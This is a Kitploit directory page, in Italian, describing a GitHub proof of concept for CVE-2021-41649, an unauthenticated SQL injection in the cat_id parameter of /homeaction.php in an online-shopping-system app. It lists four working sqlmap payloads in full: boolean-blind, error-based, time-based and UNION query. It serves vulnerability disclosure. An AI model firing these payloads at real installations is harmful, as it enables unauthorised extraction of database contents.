Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-41649 | Kitploit
Strumenti/GitHubGitHub/mobiusbinary/cve-2021-41649
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubmobiusbinary/cve-2021-41649

CVE-2021-41649

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-41649

CVE-2021-41649 Iniezione SQL in online-shopping-system

L'applicazione online-shopping-system è vulnerabile ad attacchi di iniezione SQL non autenticati di tipo error/boolean-based blind ed error-based.

Il parametro cat_id nella pagina /homeaction.php non sanitizza l'input dell'utente; un attaccante può estrarre dati sensibili dal database MySQL sottostante.

Link all'applicazione

online-shopping-system

Componenti e parametro interessati

URL: /homeaction.php
PARAMETRO: cat_id

POC

Payload SQLMAP

Parametro cat_id nella pagina /homeaction.php

Parametro: cat_id (richiesta POST) Tipo: boolean-based blind Titolo: AND boolean-based blind - clausola WHERE o HAVING Payload: cat_id=4' AND 9760=9760 AND 'ZCfc'='ZCfc&get_seleted_Category=1

Tipo: error-based Titolo: MySQL >= 5.0 AND error-based - clausola WHERE, HAVING, ORDER BY o GROUP BY (FLOOR) Payload: cat_id=4' AND (SELECT 4034 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (ELT(4034=4034,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sGIO'='sGIO&get_seleted_Category=1

Tipo: time-based blind Titolo: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: cat_id=4' AND (SELECT 9762 FROM (SELECT(SLEEP(5)))PAcf) AND 'hpHO'='hpHO&get_seleted_Category=1

Tipo: UNION query Titolo: UNION query generica (NULL) - 10 colonne Payload: cat_id=4' UNION ALL SELECT CONCAT(0x71707a7171,0x746e4d4b5a706566596771585179566943487446575673515244507a52507345694d6b5a754d7049,0x71787a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&get_seleted_Category=1

Se l'immagine POC non è chiara, fai clic sulla GIF che verrà caricata con una risoluzione migliore.

POC - proId

Scoperto da

Jason Colyvas
MOBIUSBINARY
21 settembre 2021

Scarica lo strumento